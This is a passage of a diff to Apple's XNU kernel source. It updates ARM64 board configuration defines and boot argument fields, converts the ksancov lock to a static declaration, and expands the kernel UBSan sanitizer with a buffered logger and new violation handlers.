-#define XNU_MONITOR_T8020_DART         1 /* T8020 DART plugin for secure pmap runtime */
-#define T8020_DART_ALLOW_BYPASS        (1 << 1) /* DART allows translation bypass in certain cases */
-#define XNU_MONITOR_NVME_PPL           1 /* NVMe PPL plugin for secure pmap runtime */
-#define XNU_MONITOR_ANS2_SART          1 /* ANS2 SART plugin for secure pmap runtime */
-#define PMAP_CS                        1
-#define PMAP_CS_ENABLE                 1
 #endif  /* ARM64_BOARD_CONFIG_T8027 */
 
 #ifdef ARM64_BOARD_CONFIG_T8028
 #ifdef ARM64_BOARD_CONFIG_T8103
 #include <pexpert/arm64/H13.h>
 #include <pexpert/arm64/spr_locks.h>
+#undef HAS_SIQ
 
 #define MAX_L2_CLINE                   7
 #define MAX_CPUS                       8
 #define CORE_NCTRS                     8 /* Placeholder; KPC is not enabled for this target */
 #endif  /* ARM64_BOARD_CONFIG_BCM2837 */
 
+
 #ifndef HAS_UNCORE_CTRS
 #undef UNCORE_VERSION
 #undef UNCORE_PER_CLUSTER
index 1bcf4990e4fad01622e643eebd7fa501aedf07cd..f43d16e4be6cd9aa8b3f98ed4bb58d34aefe6292 100644 (file)
@@ -42,6 +42,7 @@ struct Boot_Video {
 #define kBootVideoDepthDepthShift       (0)
 #define kBootVideoDepthRotateShift      (8)
 #define kBootVideoDepthScaleShift       (16)
+#define kBootVideoDepthBootRotateShift  (24)
 
 #define kBootFlagsDarkBoot              (1ULL << 0)
 
index de2f95e8df19aac4b1b04aadee1e9e8adfe3d846..7486640e7b2bbde0301f294a834e1c6d96a3ffe8 100644 (file)
@@ -202,14 +202,20 @@ typedef struct boot_args {
        /* Version 2, Revision 1 */
        uint64_t    KC_hdrs_vaddr;
 
-       uint64_t    arvRootHashStart; /* Physical address of root hash file */
+       uint64_t    arvRootHashStart; /* Physical address of system volume root hash file */
        uint64_t    arvRootHashSize;
 
-       uint64_t    arvManifestStart; /* Physical address of manifest file */
+       uint64_t    arvManifestStart; /* Physical address of system volume manifest file */
        uint64_t    arvManifestSize;
 
+       uint64_t    bsARVRootHashStart;/* Physical address of base system root hash file */
+       uint64_t    bsARVRootHashSize;
+
+       uint64_t    bsARVManifestStart;/* Physical address of base system manifest file */
+       uint64_t    bsARVManifestSize;
+
        /* Reserved */
-       uint32_t    __reserved4[700];
+       uint32_t    __reserved4[692];
 } boot_args;
 
 extern char assert_boot_args_size_is_4096[sizeof(boot_args) == 4096 ? 1 : -1];
index 72f916f33bc415f6531182c5d6469f4a57a4c883..4f0c5a53f4496d0421c469a9ebcf207bf27f4db6 100644 (file)
@@ -139,12 +139,12 @@ ___ubsan_handle_negate_overflow
 ___ubsan_handle_negate_overflow_abort
 ___ubsan_handle_nonnull_arg
 ___ubsan_handle_nonnull_arg_abort
-___ubsan_handle_nonnull_return
-___ubsan_handle_nonnull_return_abort
+___ubsan_handle_nonnull_return_v1
+___ubsan_handle_nonnull_return_v1_abort
 ___ubsan_handle_nullability_arg
 ___ubsan_handle_nullability_arg_abort
-___ubsan_handle_nullability_return
-___ubsan_handle_nullability_return_abort
+___ubsan_handle_nullability_return_v1
+___ubsan_handle_nullability_return_v1_abort
 ___ubsan_handle_out_of_bounds
 ___ubsan_handle_out_of_bounds_abort
 ___ubsan_handle_pointer_overflow
index 00c42c7781b82d9c330c74174f5e42e58d96b673..9d7a97047666f9c3db10faae88bbb108e0c0168f 100644 (file)
@@ -46,5 +46,4 @@ fun:_ZL18IOTrackingLeakScanPv
 # Exclude KASAN dependencies
 # XXX: could this be relaxed since fakestack is reentrant?
 src:./osfmk/kern/zalloc.c
-src:./osfmk/kern/zcache.c
 
index 9f45135d63d00ada065a9a890f57d9813326ed02..b865b7ff2256c3a69c1e28fe454991c41b837b01 100644 (file)
@@ -282,11 +282,12 @@ kasan_init_fakestack(void)
 
                snprintf(fakestack_names[i], 16, "fakestack.%d", i);
                fakestack_zones[i] = zone_create_ext(fakestack_names[i], sz,
-                   ZC_NOCALLOUT | ZC_NOGC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE,
+                   ZC_NOCALLOUT | ZC_NOGC | ZC_NOCACHING |
+                   ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE,
                    ZONE_ID_ANY, ^(zone_t z) {
-                       zone_set_exhaustible(z, maxsz);
+                       zone_set_exhaustible(z, maxsz / sz);
                });
-               zfill(fakestack_zones[i], (int)maxsz / sz);
+               zone_fill_initially(fakestack_zones[i], maxsz / sz);
        }
 
        /* globally enable */
index 762d69da8e004853894c7ca58ca200d53f85ae17..975a5fc2c7b30ba20889ba61eafecaa9183f8fac 100644 (file)
@@ -106,7 +106,7 @@ static uint32_t __unused npcs = 0;
 static _Atomic unsigned active_devs;
 
 static LCK_GRP_DECLARE(ksancov_lck_grp, "ksancov_lck_grp");
-static lck_rw_t *ksancov_devs_lck;
+static LCK_RW_DECLARE(ksancov_devs_lck, &ksancov_lck_grp);
 
 /* array of devices indexed by devnode minor */
 static ksancov_dev_t ksancov_devs[KSANCOV_MAX_DEV];
@@ -386,21 +386,21 @@ ksancov_open(dev_t dev, int flags, int devtype, proc_t p)
                return EBUSY;
        }
 
-       lck_rw_lock_exclusive(ksancov_devs_lck);
+       lck_rw_lock_exclusive(&ksancov_devs_lck);
 
        if (ksancov_devs[minor_num]) {
-               lck_rw_unlock_exclusive(ksancov_devs_lck);
+               lck_rw_unlock_exclusive(&ksancov_devs_lck);
                return EBUSY;
        }
 
        ksancov_dev_t d = create_dev(dev);
        if (!d) {
-               lck_rw_unlock_exclusive(ksancov_devs_lck);
+               lck_rw_unlock_exclusive(&ksancov_devs_lck);
                return ENOMEM;
        }
        ksancov_devs[minor_num] = d;
 
-       lck_rw_unlock_exclusive(ksancov_devs_lck);
+       lck_rw_unlock_exclusive(&ksancov_devs_lck);
 
        return 0;
 }
@@ -531,6 +531,9 @@ ksancov_detach(ksancov_dev_t d)
                thread_wait(d->thread, TRUE);
        }
 
+       assert(active_devs >= 1);
+       os_atomic_sub(&active_devs, 1, relaxed);
+
        /* drop our thread reference */
        thread_deallocate(d->thread);
        d->thread = THREAD_NULL;
@@ -542,10 +545,10 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p)
 #pragma unused(flags,devtype,p)
        const int minor_num = minor(dev);
 
-       lck_rw_lock_exclusive(ksancov_devs_lck);
+       lck_rw_lock_exclusive(&ksancov_devs_lck);
        ksancov_dev_t d = ksancov_devs[minor_num];
        ksancov_devs[minor_num] = NULL; /* dev no longer discoverable */
-       lck_rw_unlock_exclusive(ksancov_devs_lck);
+       lck_rw_unlock_exclusive(&ksancov_devs_lck);
 
        /*
         * No need to lock d here as there is and will be no one having its
@@ -558,10 +561,8 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p)
        }
 
        if (d->mode == KS_MODE_TRACE && d->trace) {
-               os_atomic_sub(&active_devs, 1, relaxed);
                os_atomic_store(&d->trace->enabled, 0, relaxed); /* stop tracing */
        } else if (d->mode == KS_MODE_COUNTERS && d->counters) {
-               os_atomic_sub(&active_devs, 1, relaxed);
                os_atomic_store(&d->counters->enabled, 0, relaxed);         /* stop tracing */
        }
 
@@ -620,10 +621,10 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p)
        struct ksancov_buf_desc *mcmd;
        void *data = (void *)_data;
 
-       lck_rw_lock_shared(ksancov_devs_lck);
+       lck_rw_lock_shared(&ksancov_devs_lck);
        ksancov_dev_t d = ksancov_devs[minor(dev)];
        if (!d) {
-               lck_rw_unlock_shared(ksancov_devs_lck);
+               lck_rw_unlock_shared(&ksancov_devs_lck);
                return EINVAL;         /* dev not open */
        }
 
@@ -666,7 +667,7 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p)
                break;
        }
 
-       lck_rw_unlock_shared(ksancov_devs_lck);
+       lck_rw_unlock_shared(&ksancov_devs_lck);
 
        return ret;
 }
@@ -736,7 +737,5 @@ ksancov_init_dev(void)
        ksancov_edgemap->nedges = (uint32_t)nedges;
        ksancov_edgemap->offset = KSANCOV_PC_OFFSET;
 
-       ksancov_devs_lck = lck_rw_alloc_init(&ksancov_lck_grp, LCK_ATTR_NULL);
-
        return 0;
 }
index 0c0a11ecebd55993695419dcec0b83b71e6d01c3..a40ce58a3268afeaf60bb3e05cf2f63c1d8acc36 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2016 Apple Inc. All rights reserved.
+ * Copyright (c) 2016-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -75,7 +75,14 @@ __nosan_strlcpy(char *dst, const char *src, size_t sz)
 static inline char  *
 __nosan_strncpy(char *dst, const char *src, size_t sz)
 {
+#ifdef __clang__
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wdeprecated-declarations"
+#endif
        return strncpy(dst, src, sz);
+#ifdef __clang__
+#pragma clang diagnostic pop
+#endif
 }
 static inline size_t
 __nosan_strlcat(char *dst, const char *src, size_t sz)
@@ -85,7 +92,14 @@ __nosan_strlcat(char *dst, const char *src, size_t sz)
 static inline char  *
 __nosan_strncat(char *dst, const char *src, size_t sz)
 {
+#ifdef __clang__
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wdeprecated-declarations"
+#endif
        return strncat(dst, src, sz);
+#ifdef __clang__
+#pragma clang diagnostic pop
+#endif
 }
 static inline size_t
 __nosan_strnlen(const char *src, size_t sz)
index d8e42d708bc1fb741c52d924d1bf68ba9922f1a8..d245d424c51035a529418eca520aa93d24d4cd91 100644 (file)
@@ -28,6 +28,7 @@
 
 #include <stdatomic.h>
 #include <kern/debug.h>
+#include <kern/assert.h>
 #include <libkern/libkern.h>
 #include "ubsan.h"
 
@@ -35,14 +36,27 @@ static const bool ubsan_print = false;
 static const uint32_t line_acquired = 0x80000000UL;
 static const char *get_type_check_kind(uint8_t kind);
 
-static size_t
-format_loc(struct san_src_loc *loc, char *dst, size_t sz)
+static void
+ubsan_buf_log(struct ubsan_buf *ub, const char *fmt, ...)
 {
-       return scnprintf(dst, sz, ", file:\"%s\", line:%d, column:%d },\n",
-                  loc->filename,
-                  loc->line & ~line_acquired,
-                  loc->col
-                  );
+       va_list ap;
+
+       va_start(ap, fmt);
+       int n = vscnprintf(ub->ub_buf + ub->ub_logged, ub->ub_buf_size - ub->ub_logged, fmt, ap);
+       va_end(ap);
+
+       ub->ub_logged += n;
+       assert(ub->ub_logged <= ub->ub_buf_size);
+}
+
+static void
+ubsan_buf_log_loc(struct ubsan_buf *ub, const char *desc, struct san_src_loc *loc)
+{
+       ubsan_buf_log(ub, "%s:{ file:\"%s\", line:%d, column:%d }",
+           desc,
+           loc->filename,
+           loc->line & ~line_acquired,
+           loc->col);
 }
 
 /*
@@ -70,33 +84,30 @@ overflow_str[] = {
        NULL
 };
 
-static size_t
-format_overflow(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_overflow(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
        struct san_type_desc *ty = v->overflow->ty;
-       return scnprintf(buf, sz,
-                  "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx, ",
-                  ty->issigned ? "signed" : "unsigned",
-                  overflow_str[v->ubsan_type],
-                  ty->name,
-                  1 << ty->width,
-                  v->lhs,
-                  v->rhs
-                  );
+       ubsan_buf_log(ub,
+           "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx",
+           ty->issigned ? "signed" : "unsigned",
+           overflow_str[v->ubsan_type],
+           ty->name,
+           1 << ty->width,
+               v->lhs,
+               v->rhs
+           );
 }
 
-static size_t
-format_shift(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_shift(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = 0;
        struct san_type_desc *l = v->shift->lhs_t;
        struct san_type_desc *r = v->shift->rhs_t;
 
-       n += scnprintf(buf + n, sz - n, "problem:\"bad shift\", ");
-       n += scnprintf(buf + n, sz - n, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width);
-       n += scnprintf(buf + n, sz - n, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d, ", v->rhs, r->name, r->issigned, 1 << r->width);
-
-       return n;
+       ubsan_buf_log(ub, "problem:\"bad shift\", ");
+       ubsan_buf_log(ub, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width);
+       ubsan_buf_log(ub, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d", v->rhs, r->name, r->issigned, 1 << r->width);
 }
 
 static const char * const
@@ -114,89 +125,196 @@ get_type_check_kind(uint8_t kind)
               : "some";
 }
 
-static size_t
-format_type_mismatch(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = 0;
        size_t alignment = 1 << v->align->align;
        void *ptr = (void*)v->lhs;
-       const char * kind = get_type_check_kind(v->align->kind);
+       const char *kind = get_type_check_kind(v->align->kind);
+
        if (NULL == ptr) {
                //null pointer use
-               n += scnprintf(buf + n, sz - n, "problem:\"%s NULL pointer\", ty:\"%s\", ", kind, v->align->ty->name);
+               ubsan_buf_log(ub, "problem:\"%s NULL pointer\", ty:\"%s\"", kind, v->align->ty->name);
        } else if (alignment && ((uintptr_t)ptr & (alignment - 1))) {
                //misaligned pointer use
-               n += scnprintf(buf + n, sz - n, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ", kind, (void*)v->lhs, v->align->ty->name);
-               n += scnprintf(buf + n, sz - n, "required_alignment:%d, ", 1 << v->align->align);
+               ubsan_buf_log(ub, "problem:\"%s mis-aligned\", address:%p, ty:\"%s\", ",
+                   kind, (void*)v->lhs, v->align->ty->name);
+               ubsan_buf_log(ub, "required_alignment:%d", 1 << v->align->align);
        } else {
                //insufficient object size
-               n += scnprintf(buf + n, sz - n, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p, ",
+               ubsan_buf_log(ub, "problem:\"%s insufficient object size\", ty:\"%s\", address:%p",
                    kind, v->align->ty->name, ptr);
        }
-
-       return n;
 }
 
-static size_t
-format_oob(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_oob(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = 0;
        struct san_type_desc *aty = v->oob->array_ty;
        struct san_type_desc *ity = v->oob->index_ty;
        uintptr_t idx = v->lhs;
 
-       n += scnprintf(buf + n, sz - n, "problem:\"OOB array access\", ");
-       n += scnprintf(buf + n, sz - n, "idx:%ld, ", idx);
-       n += scnprintf(buf + n, sz - n, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width);
-       n += scnprintf(buf + n, sz - n, "ity:\"%s\", isigned:%d, iwidth:%d, ", ity->name, ity->issigned, 1 << ity->width);
+       ubsan_buf_log(ub, "problem:\"OOB array access\", ");
+       ubsan_buf_log(ub, "idx:%ld, ", idx);
+       ubsan_buf_log(ub, "aty:\"%s\", asigned:%d, awidth:%d, ", aty->name, aty->issigned, 1 << aty->width);
+       ubsan_buf_log(ub, "ity:\"%s\", isigned:%d, iwidth:%d", ity->name, ity->issigned, 1 << ity->width);
+}
 
-       return n;
+static void
+format_nullability_arg(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_nullability_arg_desc *data = v->nonnull_arg;
+
+       const int arg_index = data->arg_index;
+       const char *attr_type = v->lhs ? "nonnull attribute" : "_Nonnull annotation";
+
+       ubsan_buf_log(ub, "problem:\"null in argument %d declared with %s\", ", arg_index, attr_type);
+       ubsan_buf_log_loc(ub, "declared", &data->attr_loc);
 }
 
-static size_t
-format_load_invalid_value(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_nonnull_return(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       return scnprintf(buf, sz, "problem:\"invalid value load\", type:\"%s\", value:0x%llx",
-                  v->invalid->type->name, v->lhs);
+       struct san_src_loc *declaration = (struct san_src_loc *)v->rhs;
+       const char *return_type = v->lhs ? "returns_nonnull attribute" : "_Nonnull return type annotation";
+
+       ubsan_buf_log(ub, "problem:\"null returned from function declared with %s\", ", return_type);
+       ubsan_buf_log_loc(ub, "declared", declaration);
 }
 
-size_t
-ubsan_format(struct ubsan_violation *v, char *buf, size_t sz)
+static void
+format_load_invalid_value(struct ubsan_violation *v, struct ubsan_buf *ub)
 {
-       size_t n = scnprintf(buf, sz, "{ ");
+       ubsan_buf_log(ub, "problem:\"invalid value load\", type:\"%s\", value:0x%llx",
+           v->invalid->type->name, v->lhs);
+}
+
+static void
+format_missing_return(struct ubsan_violation *v __unused, struct ubsan_buf *ub)
+{
+       ubsan_buf_log(ub, "problem:\"no value returned from value-returning function\"");
+}
+
+static void
+format_float_cast_overflow(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_float_desc *data = v->flt;
+       /*
+        * Cannot print out offending value (e.g. using %A, %f and so on) as kernel logging
+        * does not support float types (yet).
+        */
+       ubsan_buf_log(ub, "problem:\"%s type value outside the range of %s\"",
+           data->type_from->name, data->type_to->name);
+}
+
+static const char *
+get_implicit_conv_type(unsigned char kind)
+{
+       static const char * const conv_types[] = {
+               "integer truncation",
+               "unsigned integer truncation",
+               "signed integer truncation",
+               "integer sign change",
+               "signed integer truncation or sign change"
+       };
+       static const size_t conv_types_cnt = sizeof(conv_types) / sizeof(conv_types[0]);
+
+       return kind < conv_types_cnt ? conv_types[kind] : "unknown implicit integer conversion";
+}
+
+static void
+format_implicit_conversion(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_implicit_conv_desc *data = v->implicit;
+       struct san_type_desc *from = data->type_from;
+       struct san_type_desc *to = data->type_to;
+
+       ubsan_buf_log(ub, "problem:\"%s\", ", get_implicit_conv_type(data->kind));
+       ubsan_buf_log(ub, "src value:%#llx type:\"%s\", signed:%d, width:%d, ",
+           v->lhs, from->name, from->issigned, 1 << from->width);
+       ubsan_buf_log(ub, "dst value:%#llx type:\"%s\", signed:%d, width:%d",
+           v->rhs, to->name, to->issigned, 1 << to->width);
+}
+
+static void
+format_function_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_func_type_mismatch_desc *data = v->func_mismatch;
+       ubsan_buf_log(ub, "problem:\"indirect function call through %p of a wrong type %s\"",
+           (void *)v->lhs, data->type->name);
+}
+
+static void
+format_vla_bound_not_positive(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       struct ubsan_vla_bound_desc *data = v->vla_bound;
+       ubsan_buf_log(ub, "problem:\"VLA %s bound %#llx not positive\"", data->type->name, v->lhs);
+}
+
+static void
+format_invalid_builtin(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       ubsan_buf_log(ub, "problem:\"passing invalid zero argument to %s\"",
+           v->invalid_builtin->kind == 0 ? "ctz()" : "clz()");
+}
+
+void
+ubsan_format(struct ubsan_violation *v, struct ubsan_buf *ub)
+{
+       ubsan_buf_log(ub, "{ ");
 
        switch (v->ubsan_type) {
        case UBSAN_OVERFLOW_add ... UBSAN_OVERFLOW_negate:
-               n += format_overflow(v, buf + n, sz - n);
+               format_overflow(v, ub);
                break;
        case UBSAN_UNREACHABLE:
-               n += scnprintf(buf + n, sz - n, "problem:\"unreachable\", ");
+               ubsan_buf_log(ub, "problem:\"unreachable\", ");
                break;
        case UBSAN_SHIFT:
-               n += format_shift(v, buf + n, sz - n);
+               format_shift(v, ub);
                break;
        case UBSAN_TYPE_MISMATCH:
-               n += format_type_mismatch(v, buf + n, sz - n);
+               format_type_mismatch(v, ub);
                break;
        case UBSAN_POINTER_OVERFLOW:
-               n += scnprintf(buf + n, sz - n, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx, ", v->lhs, v->rhs);
+               ubsan_buf_log(ub, "problem:\"pointer overflow\", before:0x%llx, after:0x%llx", v->lhs, v->rhs);
                break;
        case UBSAN_OOB:
-               n += format_oob(v, buf + n, sz - n);
+               format_oob(v, ub);
                break;
-       case UBSAN_LOAD_INVALID_VALUE:
-               n += format_load_invalid_value(v, buf + n, sz - n);
+       case UBSAN_NULLABILITY_ARG:
+               format_nullability_arg(v, ub);
+               break;
+       case UBSAN_NULLABILITY_RETURN:
+               format_nonnull_return(v, ub);
+               break;
+       case UBSAN_MISSING_RETURN:
+               format_missing_return(v, ub);
+               break;
+       case UBSAN_FLOAT_CAST_OVERFLOW:
+               format_float_cast_overflow(v, ub);
+               break;
+       case UBSAN_IMPLICIT_CONVERSION:
+               format_implicit_conversion(v, ub);
                break;
-       case UBSAN_GENERIC:
-               n += scnprintf(buf + n, sz - n, "problem:\"generic\", function:\"%s\", ", v->func);
+       case UBSAN_FUNCTION_TYPE_MISMATCH:
+               format_function_type_mismatch(v, ub);
+               break;
+       case UBSAN_VLA_BOUND_NOT_POSITIVE:
+               format_vla_bound_not_positive(v, ub);
+               break;
+       case UBSAN_INVALID_BUILTIN:
+               format_invalid_builtin(v, ub);
+               break;
+       case UBSAN_LOAD_INVALID_VALUE:
+               format_load_invalid_value(v, ub);
                break;
        default:
                panic("unknown violation");
        }
 
-       n += format_loc(v->loc, buf + n, sz - n);
-
-       return n;
+       ubsan_buf_log_loc(ub, ", found", v->loc);
+       ubsan_buf_log(ub, " },\n");
 }
 
 enum UBFatality { Fatal, FleshWound };
@@ -212,10 +330,13 @@ ubsan_handle(struct ubsan_violation *v, enum UBFatality fatality)
        ubsan_log_append(v);
 
        if (ubsan_print || (fatality == Fatal)) {
-               const size_t sz = 256;
-               static char buf[sz];
-               buf[0] = '\0';
-               ubsan_format(v, buf, sz);
+               static char buf[256] = { 0 };
+               struct ubsan_buf ubsan_buf = {
+                       .ub_logged = 0,
+                       .ub_buf_size = sizeof(buf),
+                       .ub_buf = buf
+               };
+               ubsan_format(v, &ubsan_buf);
                printf("UBSan: %s", buf);
        }
 }
@@ -299,6 +420,146 @@ __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *desc, uint64_t idx)
        ubsan_handle(&v, Fatal);
 }
 
+void
+__ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 0, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_ARG, 1, 0, .nonnull_arg = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 0, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, FleshWound);
+}
+
+void
+__ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *desc, uint64_t declaration)
+{
+       struct ubsan_violation v = { UBSAN_NULLABILITY_RETURN, 1, (uint64_t)&desc->loc, .nonnull_ret = desc, (struct san_src_loc *)declaration };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_missing_return(struct ubsan_missing_ret_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *desc)
+{
+       struct ubsan_violation v = { UBSAN_MISSING_RETURN, 0, 0, .missing_ret = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_float_cast_overflow(struct ubsan_float_desc *desc, uint64_t value)
+{
+       struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *desc, uint64_t value)
+{
+       struct ubsan_violation v = { UBSAN_FLOAT_CAST_OVERFLOW, value, 0, .flt = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to)
+{
+       struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *desc, uint64_t from, uint64_t to)
+{
+       struct ubsan_violation v = { UBSAN_IMPLICIT_CONVERSION, from, to, .implicit = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc *desc, uint64_t func)
+{
+       struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *desc, uint64_t func)
+{
+       struct ubsan_violation v = { UBSAN_FUNCTION_TYPE_MISMATCH, func, 0, .func_mismatch = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *desc, uint64_t length)
+{
+       struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *desc, uint64_t length)
+{
+       struct ubsan_violation v = { UBSAN_VLA_BOUND_NOT_POSITIVE, length, 0, .vla_bound = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *desc)
+{
+       struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
+void
+__ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *desc)
+{
+       struct ubsan_violation v = { UBSAN_INVALID_BUILTIN, 0, 0, .invalid_builtin = desc, &desc->loc };
+       ubsan_handle(&v, Fatal);
+}
+
 void
 __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *desc, uint64_t invalid_value)
 {
@@ -312,26 +573,3 @@ __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *desc, ui
        struct ubsan_violation v = { UBSAN_LOAD_INVALID_VALUE, invalid_value, 0, .invalid = desc, &desc->loc };
        ubsan_handle(&v, Fatal);
 }
-
-#define DEFINE_GENERIC(check) \
-       void __ubsan_handle_##check (struct san_src_loc* loc) \
-       { \
-               struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \
-               ubsan_handle(&v, FleshWound); \
-       } \
-       void __ubsan_handle_##check##_abort(struct san_src_loc* loc) \
-       { \
-               struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \
-               ubsan_handle(&v, Fatal); \
-       }
-
-DEFINE_GENERIC(invalid_builtin)
-DEFINE_GENERIC(nonnull_arg)
-DEFINE_GENERIC(vla_bound_not_positive)
-DEFINE_GENERIC(float_cast_overflow)
-DEFINE_GENERIC(function_type_mismatch)
-DEFINE_GENERIC(missing_return)
-DEFINE_GENERIC(nonnull_return)
-DEFINE_GENERIC(nullability_arg)
-DEFINE_GENERIC(nullability_return)
-DEFINE_GENERIC(implicit_conversion)
index e24045ab24177342f5f78d2a02aef4556e04d031..36dc50c22ced1fbdd04464eccf966450d2dd5fdb 100644 (file)
@@ -89,6 +89,48 @@ struct ubsan_load_invalid_desc {
        struct san_type_desc *type;
 };
 
+struct ubsan_nullability_arg_desc {
+       struct san_src_loc loc;
+       struct san_src_loc attr_loc;
+       int arg_index;
+};
+
+struct ubsan_nullability_ret_desc {
+       struct san_src_loc loc;
+};
+
+struct ubsan_missing_ret_desc {
+       struct san_src_loc loc;
+};
+
+struct ubsan_float_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type_from;
+       struct san_type_desc *type_to;
+};
+
+struct ubsan_implicit_conv_desc {
